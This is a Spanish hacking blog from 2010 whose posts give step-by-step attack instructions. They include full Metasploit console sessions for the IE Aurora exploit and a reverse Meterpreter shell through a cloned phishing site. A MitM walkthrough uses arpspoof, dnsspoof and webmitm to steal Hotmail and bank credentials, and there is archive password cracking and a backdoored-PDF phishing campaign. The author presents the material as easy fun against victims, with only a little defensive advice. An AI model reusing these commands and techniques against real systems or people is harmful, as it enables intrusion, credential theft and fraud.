Últimas entradas »

jueves, 25 de febrero de 2010

[Metasploit]Pantalla desbloqueada con script del meterpreter

El MSF cada día me gusta mas jajaja :P, ahora les traigo un video de como ingresar a un sistema con el MSF y desbloquear la pantalla :P. Acá dejo la descripción de dondé encontré el video + el video :P

Suerte!



"In this video, we look at a demo of the screen unlock meterpreter script. The script needs SYSTEM privileges and patches the msv1_0.dll loaded by lsass.exe so that every password will be accepted to unlock the screen. (the patch can also be undone to get back to normal behavior). Currently Windows XP SP2 and SP3 are supported. You can download it from here. The script author's blog has more details.
Thanks go out to PaulDotCom for uploading this to vimeo"

Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.

[Metasploit] Intrusion Automatizada con Nmap y MSF

Bueno... jajaj esto comprueba mi "teoría" de que el bug del puerto 445 ya algo antiguo
pero no por eso deja de ser un bug con buena explotación.

Este video básicamente trata encontrar una victima con el puerto 445 explotable y que con el
Metasploit automatizar una analisis y ver cual es el mejor exploit para usar :), realmente bueno :).

Suerte!

LINK DEL VIDEO



PD: Autor del video: Progresive Death

miércoles, 24 de febrero de 2010

Cracking de archivos comprimidos con BT4 y Rarcrack

Buenas :)!
El día de hoy les traigo un manual + video de como crackear archivos comprimidos como
zip ,rar y 7z con clave, con una tool llamada rarcrack del Backtrack4.
Está en ingles pero dejaré la traducción de google acá(para nada recomendado xD) o simplemente vean el video al final de este articulo, pero en todo caso no es un nivel de ingles muy complicado, osea viendo las imagenes y sabiendo aun poco ingles se puede entender fasilmente.

Traducción(mala xD): AQUI

Web del autor: adaywithtape.blogspot.com



Cracking password protedted archive files with rarcrack

There are a large number of password cracking (or to word it in a nice fashion, password recovery) programs available to crack passwords of any number of file type.

Here I will be looking at cracking password protected archive files with rarcrack which is included in the back|track 4 distro.

First lets navigate to rarcrack in back|track, see the help file and which files are located in the rarcrack directory.

cd /pentest/passwords/rarcrack
./rarcrack --help
ls





There are 3 test files included in the rarcrack directory, but lets try rarcrack on some of the files which I created which are on a USB drive; /media/4G/

Starting an attack ;

This below on a zip file created with WinRar;
./rarcrack --type zip --threads 8 /media/4G/TEST6-winrar.zip


This one below on a zip file created in 7-Zip with ZipCrypto encryption;
./rarcrack --type zip --threads 8 /media/4G/TEST-ZipCrypto.zip




This one below on a 7z archive with AES256 encryption;
./rarcrack --type 7z --threads 8 /media/4G/TEST1-AES256.7z
So Slow !

When a crack attempt is started, an xml status file is created in the directory where the archive file is located.
So we can stop the crack and edit the values of the xml file to help speed up the cracking process.




This xml file can be editted to change the character list being used for the crack, in this case as I know the
password is a numerical value, we can edit the xml file so that rarcrack only checks numbers;

nano /media/4G/TEST1-AES256.7z.xml



















Changing the character set to numerical only;


Now we restart the attack on the 7z file and the attack will resume but now only check numerical values;

./rarcrack --type 7z --threads 8 /media/4G/TEST1-AES256.7z










Video on the above using rarcrack can be found here ;

http://blip.tv/file/2816224
or
http://www.youtube.com/watch?v=BMFn-jps3iY


Although I am trying to stick to the back|track tools in my posts, I have to divert somewhat here and mention a Windows tool by Elcomsoft; "Advanced Archive Password Recovery" (ARCHPR).
It is a great tool and Elcomsoft have password recovery tools for a fantastic number of filetypes.


It has an easy interface with various cracking options such as Bruteforce and Dictionary attacks, and is also able to include characters which you think may be correct and mask those you want testing, as in; pass????.

The speed reached is much better in most cases than what rarcrack achieves and also is more flexible on which files can be chosen, although it does not support 7zip created archives.

With rarcrack I was having trouble with it catching the passwords on zip files with AES encryption, ARCHPR has no trouble with these.

ARCHPR in action with bruteforce options ;


































































Dictionary attack ;



























Video:


Explotando Bug de Win7 con Backtrack 4

Hola :) bueno les comento....
Encontré este video que trata de como aprovechar un bug en el puerto 445
del windows7, sinceramente creo que conocía este bug pero para Windows XP
(no tengo muy buena memoria) pero realmente no estoy seguro :)

Exploit : AQUI
Video: AQUI

Local File Disclosure (LFD)

Bueno... un papper de Local File Disclosure :), no está nada de malo, está en ingles paro nada difisil de entender :)

Saludos!

VER PAPPER AQUÍ

martes, 23 de febrero de 2010

Poison-host con PowerPoint

Hi!, les cuento... navegando por hay.. encontré este papper de como
hacer poison-host con un powerpoint... :) el metodo igual es algo
antiguo pero me dio mucha curiosidad el archivo así que igual les
dejo el link :)

AQUI

[SET]Aurora Attack Demo usando Social Engineer Toolkit

Hola! bueno... como publiqué anteriormente, hay un manual de como usar el exploit
ie_aurora con el Metasploit para el bug de IE :), pero ahora les traigo lo mismo
pero de forma mucho mas fácil y rápida con el Social Engineer Toolkit v.04 :)

PD: Ojo debes tener el ie_aurora guardado en el Mestasploit

Suerte!



Aurora Attack usando Social Engineer Toolkit


Pasos:

1.- Yo estoy usando el BT4 pero venía con el SET v0.3 así que lo primero será actualizarlo.
# svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

2.- Ejecutamos el SET (Backtrack>penetration) y seguimos esta secuencia:

2. Website Attack Vectors
2. Clone and setup a fake website
2. The Metasploit Browser Exploit Method
Enter the url to clone: http://www.webclonada.com
1. Microsoft Internet Explorer "Aurora" Memory Corruption (MS10-002)
2. Windows Reverse_TCP Meterpreter
msf exploit(ie_aurora) > sessions -i 1
meterpreter > shell

Y listo! :D
Es muy facil!, acá les dejo un video de muestra;

Social-Engineer Toolkit v0.4 Aurora Attack from David Kennedy on Vimeo.

lunes, 22 de febrero de 2010

Ataque MITM by Rx

Un buen manual, quisas algo antiguo pero sige siendo igual de bueno :)

Saludos!




Hola, bueno... estaba pensando en mostrar una de las técnicas que más uso, el Man-In-The-Middle (MitM). Usaré esta técnica para mostrarles que tan fácil puede ser robar las contraseñas de Hotmail (o cualquier otra cosa) en red, sin usar remote exploits ni nada parecido.

Primero debemos obviamente estar en la red, con una terminal linux (ya sea un LiveCD, de seguro despues enseño como crear nuestra propia LiveCD personalizada). Debemos asegurarnos que tenemos instalada la herramienta DSniff...

Bueno, suponiendo que la tenemos... vamos a activar el ip_forwarding, para que la conexion pase por nosotros y asi ponernos en medio sin problemas, con el siguiente código

# echo 1 > /proc/sys/net/ipv4/ip_forward

Luego de esto envenenaremos la tabla ARP de la victima, para hacerle creer a la maquina victima, que nuestra mac address es el router (o la máquina que le proporciona internet).

# arpspoof -t ip_victima ip_router

Ahora solo debemos conseguirnos un certificado SSL... pero hay un programa que lo hace por nosotros (el webmitm). Solo debemos ejecutarlo sin argumentos y comenzará a hacernos preguntas para crear el certificado.

Ya creado el certificado, deberemos crear un archivo con extension .hosts con los nombres de dominio a controlar, de la forma:

ip_atacante *.passport.com
ip_atacante *.hotmail.com
ip_atacante *.passport.net
ip_atacante *.msn.com
ip_atacante *.bbva.cl // tambien podemos robarnos las cuentas bancarias!


la guardamos como hotmail.hosts

Solo nos queda activar el sniffer, para que atienda las peticiones de estas webs

# dnsspoof -f hotmail.hosts

Y finalmente, activar nuestro queridísimo programa...


# webmitm -d


Hecho esto, tenemos que esperar... en la PC víctima, cada vez que ingrese a una de esas webs le saldrá el certificado, pero en promedio nunca lo leen y aceptan (la desesperacion de entrar en su correo), con esto ingresarán a su correo normalmente escribiendo sus datos... Cosa que nosotros desde nuestra terminal observaremos y anotaremos detallada y detenidamente...

Ven que el hacking no es tan dificil ??



Escrito por RX

domingo, 21 de febrero de 2010

[Metasploit] Adobe Exploit :)

En ingles :) , el que sabe, sabe y el que no usa el traductor de google XD

Aquí en Español


Fuente: http://www.question-defense.com/



Using an Adobe Exploit in a Email Attack

This attack takes advantage of a vulnerability in Adobe Reader and Acrobat. The official release is here. Adobe has been informed of this vulnerability for well over a month now and has issued a statement that it will release a fix on January 14th. It is a scary thought that this exploit will be live and in the wild for almost 2 months before Adobe decides to fix it. I am making this post in order to make people aware of how such a attack can take place and how easy it is to implement.

I will be using the Metasploit framework and Backtrack Linux in order to launch this attack.

So starting out as the attacker the first thing we need to do is craft a .pdf which contains the malicious code that will trigger the vulnerability in Adobe.

As you can see I created a .pdf with a perfectly legit looking name. I also added the Meterpreter “Backdoor” to the file with instructions to connect back to my attacking machine on port 8080 when it is opened. Most firewalls are not configured to inspect out going requests so this is a fairly effective way to bypass any firewall.

The next thing to do is craft a email which we will send to our victim. I mainly choose this method of attack in order to demonstrate how easy it is to send a spoofed email.

So what I have done here is created a official looking email which looks like it came from techsupport@adobe.com. I didnt spend a ton of time on this but you can belive a real attacker will make this thing look “very” official. This email could be sent to literally thousands of people a hour. This is one of the reasons to keep your databases of emails secure because attackers will use them in this way.

Okay so the last thing we need to do is start our “Listener” . This is the process that will be waiting for the victim computers connection once the malicious .pdf is opened.

You will notice that I started the handler with the same payload, port and ip address which I used when I crafted the .pdf file file. This is a crucial step or the attack will not work.

Ok so now that we are all set, lets take a look at our victim….

There is our email in the victims gmail box. Looks perfectly normal doesn’t it?

Next our victim goes to download the .pdf so he can open it at his convenience later.

Notice how I highlighted in bright red that this computer is running a up to date version of the anti virus avast. The Meterpreter backdoor is not detected by antivirus. Our victim could scan this .pdf with 10 different anti-virus and it would come up clean each time.

Next our poor guy will open the .pdf only to find to his dismay its blank and starts creating some stability issues for Adobe.

Now we could have added some official looking text into this .pdf with real security instructions and stuff but I did not. Once again you can believe an attacker will go through the trouble of making it look very official.

So meanwhile back at the ranch where we have been patiently waiting…….

As soon as our poor victim opened the .pdf file, our backdoor reached out and connected to the attacker machine.

Thats it!

So what did we learn?

viernes, 19 de febrero de 2010

[Metasploit] Exploit IE_Aurora 0-day

Bueno... peluciando por la internet encontré este bug en el IE que permite obtener shell remota :). Ya que me gustó lo explicaré a mi manera pero igual posteriormente pondré el link de donde encontré esta información.



Pasos:

1.- Descargar exploit AQUI

2.-
Guardarlo en cualquier carpeta(en este caso Windows/Browser/)

3.- Ejecutamos el MSF y seguimos los sigente comandos:





=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 482 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7957 updated 58 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 58 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
msf exploit(ie_aurora) > set srvhost 192.168.0.101
srvhost => 192.168.0.101
msf exploit(ie_aurora) > set uripath /
uripath => /
msf exploit(ie_aurora) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Using URL: http://192.168.0.101:8080/
[*] Started bind handler




Creo que para los que se manejan en esto está demas dar explicaciones sobre el funcionamiento del MSF así que me ahorro comentarios :).


4.- Luego la victima ingresa a http://192.168.0.101:8080 y WOW! estamos listos :)

Bueno... eso fue todo :), ahora les dejo el link de donde obtube esta información:

Web con la información: elhacker.net

Vulnerabilidad 0-day en todas las versiones de Windows

Bueno antes que todo... ya no es un Bug 0-day pero bueno...xD aun sige funcionando de lo mejor :), en esta ocacción solo aré copy/paste ya que estaría demas dar una explicacion propia ya que la que existe ya es muy buena jajaja :p.


Vulnerabilidad 0-day en todas las versiones de Windows



Este fallo descubierto por el investigador Tavis Ormandy (miembro del equipo de seguridad de google), se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión “NT” y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable.

Aunque todavía no existe un parche para este fallo de seguridad, solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo:

1. Inicio/Ejecutar gpedit.msc
2. Abrir “Configuración de equipo”/ “Plantillas administrativas”/ “Componentes de Windows”/”Compatibilidad de aplicación”
3. Y habilitar “Impedir el acceso a aplicaciones de 16 bits”

O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo







Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el código fuente en este enlace (http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip), por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tus sistemas

fuente: dragonjar.org

PD: Para que los que no tienen el whoami.exe acá lo puedes descargar y no tendras problemas con que tu Windows no es original.
http://majorgeeks.com/downloadget.php?id=4331&file=9&evp=d36c17083eb5a73772fb8cf0582812d9

Welcome

Bienvenido(a) a Torpedo's Web. Aquí podrás encontrar manuales, tutoriales y cursos entre otros relacionado al mundo del hacking y seguridad informatica.

Quizás algunos ya abran conocido mi Web anterior (www.thextorpedo.com) pero actualmente se me vencerá el hosting y no tendré como pagarlo xD así que decidí hacerme este blog.


En este blog iré incorporando contenido nuevo y entremedio contenido de mi antigua Web.

ATTE

Torpedo